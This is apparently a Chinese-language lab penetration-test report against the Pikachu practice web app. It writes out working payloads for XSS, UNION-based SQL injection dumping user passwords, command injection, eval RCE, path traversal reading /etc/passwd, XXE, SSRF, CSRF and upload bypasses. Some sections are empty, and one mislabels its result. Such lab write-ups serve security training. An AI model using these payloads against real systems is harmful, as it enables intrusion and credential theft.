Skip to content

Instantly share code, notes, and snippets.

@hanshou101
Last active June 17, 2021 07:25
Show Gist options
  • Save hanshou101/64b0affb6ec78eb23e9c57828ecceb35 to your computer and use it in GitHub Desktop.
Save hanshou101/64b0affb6ec78eb23e9c57828ecceb35 to your computer and use it in GitHub Desktop.
渗透测试报告.md

渗透测试报告

1.基于表单的暴力破解

  1. 漏洞标题:http://193.42.24.107:8081/vul/burteforce/bf_form.php 基于表单的暴力破解
  2. 漏洞等级:中
  3. 漏洞描述:
    1. 访问:
      1. 网址:http://193.42.24.107:8081/vul/burteforce/bf_form.php
    2. 发现:
      1. http://193.42.24.107:8081/vul/burteforce/bf_form.php】的POST请求
        1. 没有验证码
        2. 没有请求次数限制
    3. 操作过程:
      1. 采用字典:
        1. 用户名【https://github.com/TheKingOfDuck/fuzzDicts/blob/master/userNameDict/user.txt】
        2. 密码【https://github.com/TheKingOfDuck/fuzzDicts/blob/master/passwordDict/webshell-pass.txt】
      2. 爆破
        1. 【BurpSuite】+【Cluster bomb 模式】。
    4. 结果:
      1. 发现弱密码

2.验证码绕过(on server)

  1. 漏洞标题:http://193.42.24.107:8081/vul/burteforce/bf_server.php 验证码绕过(on server),暴力破解
  2. 漏洞等级:中
  3. 漏洞描述:
    1. 访问:
      1. 网址:http://193.42.24.107:8081/vul/burteforce/bf_server.php
    2. 发现:
      1. 验证码,只要不重新请求,则一直有效。
      2. 没有请求次数限制
    3. 操作过程:
      1. 采用字典:
        1. 用户名【https://github.com/TheKingOfDuck/fuzzDicts/blob/master/userNameDict/user.txt】
        2. 密码【https://github.com/TheKingOfDuck/fuzzDicts/blob/master/passwordDict/webshell-pass.txt】
      2. 爆破
        1. 【BurpSuite】+【Cluster bomb 模式】。
        2. 此处,【验证码】直接填入【网页显示的验证码】。
    4. 结果:
      1. 发现弱密码

3.验证码绕过(on client)

  1. 漏洞标题:http://193.42.24.107:8081/vul/burteforce/bf_client.php 验证码绕过(on client),暴力破解
  2. 漏洞等级:中
  3. 漏洞描述:
    1. 访问:
      1. 网址:http://193.42.24.107:8081/vul/burteforce/bf_client.php
    2. 发现:
      1. 验证码,由前端的【createCode()】方法生成。
      2. 提交时,虽然前端验证码在参数里面。
        1. 但经过尝试,发现,即使【验证码错误】,【后台】也未进行检查。
    3. 操作过程:
      1. 采用字典:
        1. 用户名【https://github.com/TheKingOfDuck/fuzzDicts/blob/master/userNameDict/user.txt】
        2. 密码【https://github.com/TheKingOfDuck/fuzzDicts/blob/master/passwordDict/webshell-pass.txt】
      2. 爆破
        1. 【BurpSuite】+【Cluster bomb 模式】。
        2. 此处,【验证码】随意填写。
    4. 结果:
      1. 发现弱密码

4.token防爆破?

  1. 漏洞标题:http://193.42.24.107:8081/vul/burteforce/bf_token.php 绕过【token防爆破】,暴力破解
  2. 漏洞等级:中
  3. 漏洞描述:
    1. 访问:
      1. 网址:http://193.42.24.107:8081/vul/burteforce/bf_token.php
    2. 发现:
      1. 提交时,参数中有【token】字段
        1. 该字段,由【服务端渲染】网页,的【hidden】的【input】,决定。
        2. 然后,在提交时,该字段,也一起被提交。
    3. 操作过程:
      1. 采用字典:
        1. 用户名【https://github.com/TheKingOfDuck/fuzzDicts/blob/master/userNameDict/user.txt】
        2. 密码【https://github.com/TheKingOfDuck/fuzzDicts/blob/master/passwordDict/webshell-pass.txt】
      2. 爆破
        1. 【BurpSuite】+【Pitchfork 模式】。
        2. 使用【Grep - Extract】+【Redirections】。
          1. 可以自动提取,【hidden】的【input】的值。
    4. 结果:
      1. 发现弱密码

5.反射型xss(get)

  1. 漏洞标题:http://193.42.24.107:8081/vul/xss/xss_reflected_get.php 反射型xss(get)
  2. 漏洞等级:低
  3. 漏洞描述:
    1. 访问:
      1. 网址:http://193.42.24.107:8081/vul/xss/xss_reflected_get.php
    2. 发现:
      1. 存在输入点
        1. 存在长度限制
    3. 操作过程:
      1. 手动修改【maxlength】,解除长度限制。
      2. 测试【"'><svg/onload=print(1)//】,成功。
    4. 结果:
      1. 存在XSS。

6.反射性xss(post)

  1. 漏洞标题:http://193.42.24.107:8081/vul/xss/xsspost/xss_reflected_post.php 反射性xss(post)
  2. 漏洞等级:低
  3. 漏洞描述:
    1. 访问:
      1. 登录网址:http://193.42.24.107:8081/vul/xss/xsspost/post_login.php
      2. 输入点网址:http://193.42.24.107:8081/vul/xss/xsspost/xss_reflected_post.php
    2. 发现:
      1. 先用之前的【弱密码】登录。
      2. 然后,看到一个输入点
    3. 操作过程:
      1. 测试【"'><svg/onload=print(1)//】,成功。
    4. 结果:
      1. 存在XSS。

7.存储型xss

  1. 漏洞标题:http://193.42.24.107:8081/vul/xss/xss_stored.php 存储型xss
  2. 漏洞等级:中
  3. 漏洞描述:
    1. 访问:
      1. 网址:http://193.42.24.107:8081/vul/xss/xss_stored.php
    2. 发现:
      1. 存在输入点
    3. 操作过程:
      1. 测试【"'><svg/onload=print(1)//】,成功。
    4. 结果:
      1. 存在XSS。

8.DOM型xss

  1. 漏洞标题:http://193.42.24.107:8081/vul/xss/xss_dom.php DOM型xss
  2. 漏洞等级:低
  3. 漏洞描述:
    1. 访问:
      1. 网址:http://193.42.24.107:8081/vul/xss/xss_dom.php
    2. 发现:
      1. 存在输入点
    3. 操作过程:
      1. 测试【"'><img/onerror=print(1) src=0>//】,成功。
    4. 结果:
      1. 存在XSS。

9.DOM型xss-x

  1. 漏洞标题:http://193.42.24.107:8081/vul/xss/xss_dom_x.php DOM型xss-x
  2. 漏洞等级:低
  3. 漏洞描述:
    1. 访问:
      1. 网址:http://193.42.24.107:8081/vul/xss/xss_dom_x.php
    2. 发现:
      1. 存在输入点
    3. 操作过程:
      1. 测试【"'><img/onerror=print(1) src=0>//】。
      2. 提交后,点击下方<a>链接。
      3. 成功
    4. 结果:
      1. 存在XSS。

10.xss盲打

  1. 漏洞标题:http://193.42.24.107:8081/vul/xss/xssblind/xss_blind.php xss盲打
  2. 漏洞等级:高
  3. 漏洞描述:
    1. 访问:
      1. 网址:http://193.42.24.107:8081/vul/xss/xssblind/xss_blind.php
    2. 发现:
      1. 存在输入点
    3. 操作过程:
      1. 评论栏,输入【"'><img/onerror=print(1) src=0>//】;名称栏,输入【"'><img/onerror=print(1) src=0>//】。
      2. 提交后,登录【http://193.42.24.107:8081/vul/xss//xssblind/admin_login.php】查看。
      3. 触发成功。
    4. 结果:
      1. 存在XSS。

11.xss之过滤

  1. 漏洞标题:http://193.42.24.107:8081/vul/xss/xss_01.php xss之过滤,绕过之后,执行xss
  2. 漏洞等级:中
  3. 漏洞描述:
    1. 访问:
      1. 网址:http://193.42.24.107:8081/vul/xss/xss_01.php
    2. 发现:
      1. 存在输入点
    3. 操作过程:
      1. 测试【"'><img/onerror=print(1) src=0>//】,成功。
    4. 结果:
      1. 存在XSS。

12.xss之htmlspecialchars

  1. 漏洞标题:http://193.42.24.107:8081/vul/xss/xss_02.php xss之htmlspecialchars,绕过之后,执行xss
  2. 漏洞等级:低
  3. 漏洞描述:
    1. 访问:
      1. 网址:http://193.42.24.107:8081/vul/xss/xss_01.php
    2. 发现:
      1. 存在输入点
        1. 但是,一般的【< > " 】,都会被 html实体化编码 转义掉。
        2. '】单引号,不会被转义;但无法轻易闭合。
      2. 【javascrtipt: 协议】,可以使用
    3. 操作过程:
      1. 测试【javascript:print()
      2. 提交后点击,成功。
    4. 结果:
      1. 存在XSS。

13.xss之href输出

  1. 漏洞标题:http://193.42.24.107:8081/vul/xss/xss_03.php xss之href输出,绕过之后,执行xss
  2. 漏洞等级:低
  3. 漏洞描述:
    1. 访问:
      1. 网址:http://193.42.24.107:8081/vul/xss/xss_03.php
    2. 发现:
      1. 存在输入点
        1. 但是,一般的【< > " 】,都会被 html实体化编码 转义掉。
        2. '】单引号,不会被转义;但无法轻易闭合。
      2. 【javascrtipt: 协议】,可以使用
    3. 操作过程:
      1. 测试【javascript:print()
      2. 提交后点击,成功。
    4. 结果:
      1. 存在XSS。

14.xss之js输出

  1. 漏洞标题:http://193.42.24.107:8081/vul/xss/xss_04.php xss之js输出,执行xss
  2. 漏洞等级:中
  3. 漏洞描述:
    1. 访问:
      1. 网址:http://193.42.24.107:8081/vul/xss/xss_04.php
    2. 发现:
      1. 存在输入点
        1. 写入到【$ms=xxxxxx】中去。
    3. 操作过程:
      1. 测试【一段文本';print() //
      2. 提交后点击,成功。
    4. 结果:
      1. 存在XSS。

15.CSRF(get) login

  1. 漏洞标题:http://193.42.24.107:8081/vul/csrf/csrfget/csrf_get_edit.php CSRF漏洞,GET请求
  2. 漏洞等级:高
  3. 漏洞描述:
    1. 访问:
      1. 网址:http://193.42.24.107:8081/vul/csrf/csrfget/csrf_get_edit.php
    2. 发现:
      1. 登录之后,会保持登录状态。

      2. 存在修改个人信息,接口

        1. 原本信息为

          姓名:lili
          
          性别:girl
          
          手机:18656565545
          
          住址:usa
          
          邮箱:lili@pikachu.com
          
        2. _

    3. 操作过程:
      1. 构造链接【http://193.42.24.107:8081/vul/csrf/csrfget/csrf_get_edit.php?sex=test111&phonenum=test222&add=test333&email=test444&submit=submit】
      2. 发送给已登录用户,点击之后,信息就被修改了。
    4. 结果:
      1. 存在 CSRF漏洞。

16.CSRF(post) login

  1. 漏洞标题:http://193.42.24.107:8081/vul/csrf/csrfpost/csrf_post_edit.php CSRF漏洞,POST请求
  2. 漏洞等级:高
  3. 漏洞描述:
    1. 访问:
      1. 网址:http://193.42.24.107:8081/vul/csrf/csrfpost/csrf_post_edit.php
    2. 发现:
      1. 登录之后,会保持登录状态。
      2. 存在修改个人信息,接口
    3. 操作过程:
      1. 第一种方式:利用XSS漏洞,使用xhr发送post请求。
        1. 反射型、存储型,都可以。
          1. 比如,访问【http://193.42.24.107:8081/vul/xss/xss_reflected_get.php?message=%22%27%3E%3Csvg%2Fonload%3D%22jQuery.ajax%28%7B+url%3A+%27%2Fvul%2Fcsrf%2Fcsrfpost%2Fcsrf_post_edit.php%27%2C+type%3A+%27post%27%2C+data%3A+%7B+sex%3A+%27test222%27%2C+phonenum%3A+%27test222%27%2C+add%3A+%27test222%27%2C+email%3A+%27test222%27%2C+submit%3A+%27submit%27+%7D+%7D%29%3B%22%2F%2F&submit=submit】
          2. 提交后,成功修改了,个人信息。
      2. 第二种方式:利用【文件上传漏洞】+【CSRF】
        1. 构造一个 伪造页面。
          1. 使用【文件上传漏洞】,提交至【PHP服务端】。
        2. 将form表单的提交路径,改为【http://193.42.24.107:8081/vul/csrf/csrfpost/csrf_post.php】。
        3. 两种提交方式:
          1. 自动方式:js触发提交。
          2. 手动方式:用户自己点击。
        4. 将链接,发送给目标用户。
      3. 第三种方式:利用XSS漏洞,模拟【钓鱼页面】。
        1. 使用【QuickMocker】,来返回一个HTML页面。
        2. 使用【XSS】,加载对应的【HTML页面】。
    4. 结果:
      1. 存在 CSRF漏洞。

17.CSRF Token login

(似乎,这里,无法由 CSRF 突破。)

  1. 漏洞标题:http://193.42.24.107:8081/vul/csrf/csrftoken/token_get_edit.php CSRF漏洞,带token
  2. 漏洞等级:高
  3. 漏洞描述:
    1. 访问:
      1. 网址:http://193.42.24.107:8081/vul/csrf/csrftoken/token_get_edit.php
    2. 发现:
      1. 在接口请求中
        1. 存在,手动填写的资料信息。
        2. 还存在【token】参数。
    3. 操作过程:
      1. _
    4. 结果:
      1. 似乎,不存在 CSRF ?

18.数字型注入(post)

(备注,这个参考了别人的答案。自己做的时候,找不到头绪。)

  1. 漏洞标题:http://193.42.24.107:8081/vul/sqli/sqli_id.php SQL注入
  2. 漏洞等级:高
  3. 漏洞描述:
    1. 访问:
      1. 网址:http://193.42.24.107:8081/vul/sqli/sqli_id.php
    2. 发现:
      1. 【id】参数,可能可以注入
        1. 输入【id=6'】测试,证明了。
    3. 操作过程:
      1. 对于【/vul/sqli/sqli_id.php】接口
        1. submit=查询&id=6
      2. 确认字段个数
        1. id=6 order by 3
        2. id=6 order by 2
        3. 确认,位数为2
      3. 查看【显示位】
        1. id=-6 union select 1,2
        2. 确定,分别对应位置
      4. 爆库
        1. id=-1 union select 1,group_concat(schema_name) from information_schema.schemata
      5. 爆表
        1. id=-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema="pikachu"
      6. 爆列
        1. id=-1 union select 1,group_concat(column_name) from information_schema.columns where table_name='users'
      7. 爆值
        1. id=-1 union select 1,concat_ws('-',username,password) from users
      8. 得到了,所有用户的账号、密码。
    4. 结果:
      1. 存在 SQL注入漏洞。

19.字符型注入(get)

(备注,这个参考了别人的答案。自己做的时候,找不到头绪。)

  1. 漏洞标题:http://193.42.24.107:8081/vul/sqli/sqli_str.php SQL注入
  2. 漏洞等级:高
  3. 漏洞描述:
    1. 访问:

      1. 网址:http://193.42.24.107:8081/vul/sqli/sqli_str.php
    2. 发现:

      1. 在访问【http://193.42.24.107:8081/vul/sqli/sqli_str.php?name=lili&submit=查询】时,显示了【lili】用户的数据。

        1. your uid:7
          your email is: 1
          
        2. _

    3. 操作过程:

      1. 对于【/vul/sqli/sqli_str.php】接口
        1. submit=查询&name=lili
      2. 确认字段个数
        1. lili' order by 4 %23
        2. lili' order by 3 %23
        3. lili' order by 2 %23
        4. 确认,位数为2
      3. 查看【显示位】
        1. -1' union select 1,2 %23
        2. 确定,分别对应位置
      4. 爆库
        1. -1' union select 1,group_concat(schema_name) from information_schema.schemata %23
      5. 爆表
        1. -1' union select 1,group_concat(table_name) from information_schema.tables where table_schema="pikachu" %23
      6. 爆列
        1. -1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users' %23
      7. 爆值
        1. -1' union select 1,concat_ws('-',username,password) from users %23
      8. 得到了,所有用户的账号、密码。
    4. 结果:

      1. 存在 SQL注入漏洞。

20. 搜索型注入

(备注,这个参考了别人的答案。自己做的时候,找不到头绪。)

  1. 漏洞标题:http://193.42.24.107:8081/vul/sqli/sqli_search.php SQL注入
  2. 漏洞等级:高
  3. 漏洞描述:
    1. 访问:

      1. 网址:http://193.42.24.107:8081/vul/sqli/sqli_search.php
    2. 发现:

      1. 在访问【http://193.42.24.107:8081/vul/sqli/sqli_search.php?name=li&submit=搜索】时,显示了【lili】用户的数据。

        1. 用户名中含有li的结果如下:
                   
          username:lili
          uid:7
          email is: 1
          
        2. _

    3. 操作过程:

      1. 对于【/vul/sqli/sqli_search.php】接口
        1. submit=查询&name=li
      2. 确认字段个数
        1. lili' order by 4 %23
        2. lili' order by 3 %23
        3. 确认,位数为3
      3. 查看【显示位】
        1. -1' union select 1,2,3 %23
        2. 确定,分别对应位置
      4. 爆库
        1. -1' union select 1,2,group_concat(schema_name) from information_schema.schemata %23
      5. 爆表
        1. -1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema="pikachu" %23
      6. 爆列
        1. -1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' %23
      7. 爆值
        1. -1' union select 1,2,concat_ws('-',username,password) from users %23
      8. 得到了,所有用户的账号、密码。
    4. 结果:

      1. 存在 SQL注入漏洞。

21.xx型注入

(备注,这个参考了别人的答案。自己做的时候,找不到头绪。)

  1. 漏洞标题:http://193.42.24.107:8081/vul/sqli/sqli_x.php SQL注入
  2. 漏洞等级:高
  3. 漏洞描述:
    1. 访问:

      1. 网址:http://193.42.24.107:8081/vul/sqli/sqli_x.php
    2. 发现:

      1. 在访问【http://193.42.24.107:8081/vul/sqli/sqli_x.php?name=lili&submit=查询】时,显示了【lili】用户的数据。

        1. your uid:7
          your email is: 1
          
        2. _

    3. 操作过程:

      1. 对于【/sqli_x.php?name=lili&submit=查询】接口
        1. submit=查询&name=lili
      2. 此处,SQL注入类型,稍有不同:
        1. lili') %23】,这种方式
      3. 确认字段个数
        1. lili') order by 4 %23
        2. lili') order by 3 %23
        3. lili') order by 2 %23
        4. 确认,位数为2
      4. 查看【显示位】
        1. -1') union select 1,2 %23
        2. 确定,分别对应位置
      5. 爆库
        1. -1') union select 1,group_concat(schema_name) from information_schema.schemata %23
      6. 爆表
        1. -1') union select 1,group_concat(table_name) from information_schema.tables where table_schema="pikachu" %23
      7. 爆列
        1. -1') union select 1,group_concat(column_name) from information_schema.columns where table_name='users' %23
      8. 爆值
        1. -1') union select 1,concat_ws('-',username,password) from users %23
      9. 得到了,所有用户的账号、密码。
    4. 结果:

      1. 存在 SQL注入漏洞。

22."insert/update"注入

  1. 漏洞标题:
  2. 漏洞等级:
  3. 漏洞描述:
    1. _

23."delete"注入

  1. 漏洞标题:
  2. 漏洞等级:
  3. 漏洞描述:
    1. _

24."http header"注入

  1. 漏洞标题:
  2. 漏洞等级:
  3. 漏洞描述:
    1. _

25.盲注(base on boolian)

  1. 漏洞标题:
  2. 漏洞等级:
  3. 漏洞描述:
    1. _

26.盲注(base on time)

  1. 漏洞标题:
  2. 漏洞等级:
  3. 漏洞描述:
    1. _

27.宽字节注入

  1. 漏洞标题:
  2. 漏洞等级:
  3. 漏洞描述:
    1. _

28.exec "ping"

  1. 漏洞标题:http://193.42.24.107:8081/vul/rce/rce_ping.php RCE远程代码执行
  2. 漏洞等级:高
  3. 漏洞描述:
    1. 访问:
      1. 网址:http://193.42.24.107:8081/vul/rce/rce_ping.php
    2. 发现:
      1. 存在输入点,提示输入 IP 地址。
    3. 操作过程:
      1. 测试【193.42.24.107 | ls
      2. 结果:发现,确实可以执行【ls】命令。
      3. 测试【193.42.24.107 | whoami
      4. 测试【193.42.24.107 | pwd】,查看当前目录
    4. 结果:
      1. 存在 RCE远程代码执行 。

29.exec "evel"

  1. 漏洞标题:http://193.42.24.107:8081/vul/rce/rce_eval.php RCE远程代码执行(通过PHP)
  2. 漏洞等级:高
  3. 漏洞描述:
    1. 访问:
      1. 网址:http://193.42.24.107:8081/vul/rce/rce_eval.php
    2. 发现:
      1. 存在输入点。
      2. 又因为【eval函数】的提示。
    3. 操作过程:
      1. 测试【phpinfo();】。
        1. 成功显示出结果。
      2. 测试【system( '命令' );
        1. system( 'whoami' );
        2. system( 'pwd' );
        3. system( 'ls' );
    4. 结果:
      1. 存在 RCE远程代码执行 。

30.File Inclusion(local)

  1. 漏洞标题:http://193.42.24.107:8081/vul/fileinclude/fi_local.php 文件包含(本地)
  2. 漏洞等级:中
  3. 漏洞描述:
    1. 访问:
      1. 网址:http://193.42.24.107:8081/vul/fileinclude/fi_local.php
    2. 发现:
      1. 简单提交后,url变成了【?filename=file2.php】。
        1. 这里,可以手动指定,文件路径。
    3. 操作过程:
      1. 反复测试上下级目录
      2. 测试【http://193.42.24.107:8081/vul/fileinclude/fi_local.php?filename=../../../../etc/passwd&submit=提交查询】。
        1. 成功显示出结果。
    4. 结果:
      1. 存在 文件包含(本地) 。

31.File Inclusion(remote)

  1. 漏洞标题:提示【allow_url_include】未打开。
  2. 漏洞等级:
  3. 漏洞描述:
    1. 所以,无法完成。

32.Unsafe Filedownload

  1. 漏洞标题:http://193.42.24.107:8081/vul/unsafedownload/down_nba.php 下载敏感文件
  2. 漏洞等级:中
  3. 漏洞描述:
    1. 访问:
      1. 网址:http://193.42.24.107:8081/vul/unsafedownload/down_nba.php
    2. 发现:
      1. 图片地址为【http://193.42.24.107:8081/vul/unsafedownload/execdownload.php?filename=kb.png】,类似的格式。
    3. 操作过程:
      1. 尝试在【filename参数】上突破。
      2. 测试【http://193.42.24.107:8081/vul/unsafedownload/execdownload.php?filename=../../../../etc/passwd】
        1. 成功下载 passwd 文件。
    4. 结果:
      1. 存在 下载敏感文件 。

33.Unsafe Fileupload - client check

  1. 漏洞标题:http://193.42.24.107:8081/vul/unsafeupload/clientcheck.php 文件上传漏洞(客户端校验)
  2. 漏洞等级:高
  3. 漏洞描述:
    1. 访问:
      1. 网址:http://193.42.24.107:8081/vul/unsafeupload/clientcheck.php
    2. 发现:
      1. 有一个文件上传点。
        1. 尝试上传【phpinfo.php】,发现被拦截。
    3. 操作过程:
      1. 经过查看js代码,发现是客户端做的拦截。
      2. 用【BurpSuite】进行Response拦截,将【checkFileExt】函数的【var arr】,增加【php后缀】。
      3. 上传【phpinfo.php】。
      4. 得到保存路径【uploads/phpinfo.php】。
      5. 访问【http://193.42.24.107:8081/vul/unsafeupload/uploads/phpinfo.php】,成功执行。
    4. 结果:
      1. 存在 文件上传漏洞。

34.Unsafe Fileupload - MIME type

  1. 漏洞标题:http://193.42.24.107:8081/vul/unsafeupload/servercheck.php 文件上传漏洞(MIME type 绕过)
  2. 漏洞等级:高
  3. 漏洞描述:
    1. 访问:
      1. 网址:http://193.42.24.107:8081/vul/unsafeupload/servercheck.php
    2. 发现:
      1. 有一个文件上传点。
        1. 尝试上传【phpinfo.php】,发现被拦截。
        2. 好像,不是客户端拦截。
    3. 操作过程:
      1. 初步判断,是服务端拦截。
      2. 先从【MIME type】的线索,进行尝试;修改【MIME type】,也就是【Content-Type】。
      3. 使用【BurpSuite】拦截请求,将【phpinfo.php】的【Content-Type】,修改为【image/jpg】。
      4. 放行请求;发现上传成功了。
      5. 访问【http://193.42.24.107:8081/vul/unsafeupload/uploads/phpinfo.php】,成功执行。
    4. 结果:
      1. 存在 文件上传漏洞。

35.Unsafe Fileupload - getimagesize

  1. 漏洞标题:http://193.42.24.107:8081/vul/unsafeupload/getimagesize.php 文件上传漏洞(getimagesize 绕过)
  2. 漏洞等级:高
  3. 漏洞描述:
    1. 访问:
      1. 网址:http://193.42.24.107:8081/vul/unsafeupload/getimagesize.php
    2. 发现:
      1. 有一个文件上传点。
        1. 尝试修改【Content-Type】,并未能通过。
      2. 根据提示,应该和【getimagesize】方法有关。
    3. 操作过程:
      1. 尝试使用【图片加马】,来进行绕过。
        1. 创建【1像素】png图片。
        2. 使用【HxD Editor】,在图片末尾,加上【<?php phpinfo();?>】。
      2. 进行上传,上传成功。得到【上传地址】。
        1. 该地址,直接点击,仅仅是【图片格式】。
        2. 所以,我们要使用【文件包含漏洞】,来配合执行。
      3. 访问【193.42.24.107:8081/vul/fileinclude/fi_local.php?filename=../../unsafeupload/uploads/2021/06/13/48295681ao23k1934dcp3497.png&submit=提交查询】,成功执行。
    4. 结果:
      1. 存在 文件上传漏洞。

36.水平越权

  1. 漏洞标题:http://193.42.24.107:8081/vul/overpermission/op1/op1_mem.php 水平越权
  2. 漏洞等级:中
  3. 漏洞描述:
    1. 访问:
      1. 网址:http://193.42.24.107:8081/vul/overpermission/op1/op1_mem.php
    2. 发现:
      1. 登录后,可以通过【http://193.42.24.107:8081/vul/overpermission/op1/op1_mem.php?username=lili&submit=点击查看个人信息】接口,查看信息。
        1. 该接口,【username】参数,是明文传输的。
    3. 操作过程:
      1. 将【username】修改为【lucy】、【kobe】,等。
      2. 依然可以查看,其它用户的个人信息
        1. 邮箱、手机、住址
    4. 结果:
      1. 存在 水平越权漏洞。

37.垂直越权

  1. 漏洞标题:http://193.42.24.107:8081/vul/overpermission/op2/op2_login.php 垂直越权
  2. 漏洞等级:中
  3. 漏洞描述:
    1. 访问:
      1. 网址:http://193.42.24.107:8081/vul/overpermission/op2/op2_login.php
      2. 超级管理员登录,进入【http://193.42.24.107:8081/vul/overpermission/op2/op2_admin.php】页。
      3. 普通用户登录,进入【http://193.42.24.107:8081/vul/overpermission/op2/op2_user.php】页。
    2. 发现:
      1. 添加用户时,通过【/vul/overpermission/op2/op2_admin_edit.php】接口提交。
        1. 可以尝试一下
    3. 操作过程:
      1. 使用【BurpSuite】,抓取【超级管理员】添加用户的数据包。
      2. 将【/vul/overpermission/op2/op2_admin_edit.php】接口的【数据包】,修改【PHPSESSID】的cookie参数
        1. 将原本的【超级管理员】cookie,改为【普通用户】cookie。
      3. 然后,用【Repeater】进行发包。
      4. 成功。
        1. 可以看到,普通用户,也【添加用户】成功。
    4. 结果:
      1. 存在 垂直越权漏洞。

38.目录遍历 - ../../

  1. 漏洞标题:http://193.42.24.107:8081/vul/dir/dir_list.php 目录遍历
  2. 漏洞等级:中
  3. 漏洞描述:
    1. 访问:
      1. 网址:http://193.42.24.107:8081/vul/dir/dir_list.php
    2. 发现:
      1. 文章路径【http://193.42.24.107:8081/vul/dir/dir_list.php?title=jarheads.php】中,存在【title】参数
        1. 可以测试一下
    3. 操作过程:
      1. 访问【http://193.42.24.107:8081/vul/dir/dir_list.php?title=../../../../etc/passwd】,成功读取。
    4. 结果:
      1. 存在 目录遍历漏洞。

39.敏感信息泄露

  1. 漏洞标题:http://193.42.24.107:8081/vul/infoleak/findabc.php 敏感信息泄露
  2. 漏洞等级:中
  3. 漏洞描述:
    1. 访问:
      1. 网址:http://193.42.24.107:8081/vul/infoleak/findabc.php
    2. 发现:
      1. 在【源代码】中,有一处注释,<!-- 测试账号:lili/123456-->
    3. 操作过程:
      1. 使用【lili / 123456】,登录成功。
    4. 结果:
      1. 存在 敏感信息泄露漏洞。

40.PHP反序列化漏洞

(备注,这个参考了别人的答案。自己做的时候,找不到头绪。)

  1. 漏洞标题:http://193.42.24.107:8081/vul/unserilization/unser.php
  2. 漏洞等级:中
  3. 漏洞描述:
    1. 访问:
      1. 网址:http://193.42.24.107:8081/vul/unserilization/unser.php
    2. 发现:
      1. 需要对照【PHP源代码】查看。
    3. 操作过程:
      1. 构造一个【名为S】的class。
        1. 并且,有【$test】的类变量。
      2. 将其序列化,得到【O:1:"S":1:{s:4:"test";s:22:"<svg/onload=print(1)//";}
      3. 填入输入框,提交。
      4. 成功触发。
    4. 结果:
      1. 存在 PHP反序列化漏洞。

41.XXE漏洞

(备注,这个参考了别人的答案。自己做的时候,找不到头绪。)

  1. 漏洞标题:http://193.42.24.107:8081/vul/xxe/xxe_1.php XXE漏洞
  2. 漏洞等级:中
  3. 漏洞描述:
    1. 访问:
      1. 网址:http://193.42.24.107:8081/vul/xxe/xxe_1.php
    2. 发现:
      1. 需要对照【PHP源代码】查看。
    3. 操作过程:
      1. 测试基本显示,【<?xml version = "1.0"?> <!DOCTYPE note [ <!ENTITY xiaoming "XiaoMing"> ]> <name>&xiaoming;</name>
        1. 能够正常显示
      2. 测试【<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE name [ <!ENTITY myfile SYSTEM "file:///etc/passwd">]> <name>&myfile;</name>
        1. 能够正常显示
      3. 测试【<?xml version = "1.0"?> <!DOCTYPE ANY [ <!ENTITY f SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/passwd"> ]> <x>&f;</x>
        1. Base64,能够正常显示
      4. 测试【】
    4. 结果:
      1. 存在 PHP反序列化漏洞。

42.不安全的URL跳转

  1. 漏洞标题:http://193.42.24.107:8081/vul/urlredirect/urlredirect.php 不安全的URL跳转
  2. 漏洞等级:中
  3. 漏洞描述:
    1. 访问:
      1. 网址:http://193.42.24.107:8081/vul/urlredirect/urlredirect.php
    2. 发现:
      1. 存在【url】参数,决定了重定向地址。
    3. 操作过程:
      1. 访问【http://193.42.24.107:8081/vul/urlredirect/urlredirect.php?url=https://www.baidu.com】,成功跳转【https://www.baidu.com】。
    4. 结果:
      1. 存在 不安全的URL跳转。

43.SSRF(curl)

  1. 漏洞标题:http://193.42.24.107:8081/vul/ssrf/ssrf_curl.php SSRF漏洞,curl相关
  2. 漏洞等级:高
  3. 漏洞描述:
    1. 访问:
      1. 网址:http://193.42.24.107:8081/vul/ssrf/ssrf_curl.php
    2. 发现:
      1. 因为有了提示,使用了【curl】库。
      2. 后台配置错误,给出的demo,默认url为【http://127.0.0.1/vul/vul/ssrf/ssrf_info/info1.php】
        1. 其实,正确的应该是【http://127.0.0.1/vul/ssrf/ssrf_info/info1.php】。
    3. 操作过程:
      1. 测试file协议,【http://193.42.24.107:8081/vul/ssrf/ssrf_curl.php?url=file:///etc/passwd】
        1. 成功
      2. 测试https协议,【http://193.42.24.107:8081/vul/ssrf/ssrf_curl.php?url=https://www.baidu.com】
        1. 成功
    4. 结果:
      1. 存在 SSRF漏洞。

44.SSRF(file_get_content)

  1. 漏洞标题:http://193.42.24.107:8081/vul/ssrf/ssrf_fgc.php SSRF漏洞,file_get_content相关
  2. 漏洞等级:中
  3. 漏洞描述:
    1. 访问:
      1. 网址:http://193.42.24.107:8081/vul/ssrf/ssrf_fgc.php
    2. 发现:
      1. 【file_get_content】其实和【curl】类似。
      2. 后台配置错误,给出的demo,默认url为【http://127.0.0.1/vul/vul/ssrf/ssrf_info/info1.php】
        1. 其实,正确的应该是【http://127.0.0.1/vul/ssrf/ssrf_info/info1.php】。
    3. 操作过程:
      1. 测试file协议,【http://193.42.24.107:8081/vul/ssrf/ssrf_fgc.php?file=file:///etc/passwd】
        1. 成功
      2. 测试https协议,【http://193.42.24.107:8081/vul/ssrf/ssrf_fgc.php?file=https://www.baidu.com】
        1. 成功
    4. 结果:
      1. 存在 SSRF漏洞。

1.

  1. 漏洞标题:
  2. 漏洞等级:
  3. 漏洞描述:
    1. _

1.

  1. 漏洞标题:
  2. 漏洞等级:
  3. 漏洞描述:
    1. _

1.

  1. 漏洞标题:
  2. 漏洞等级:
  3. 漏洞描述:
    1. _
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment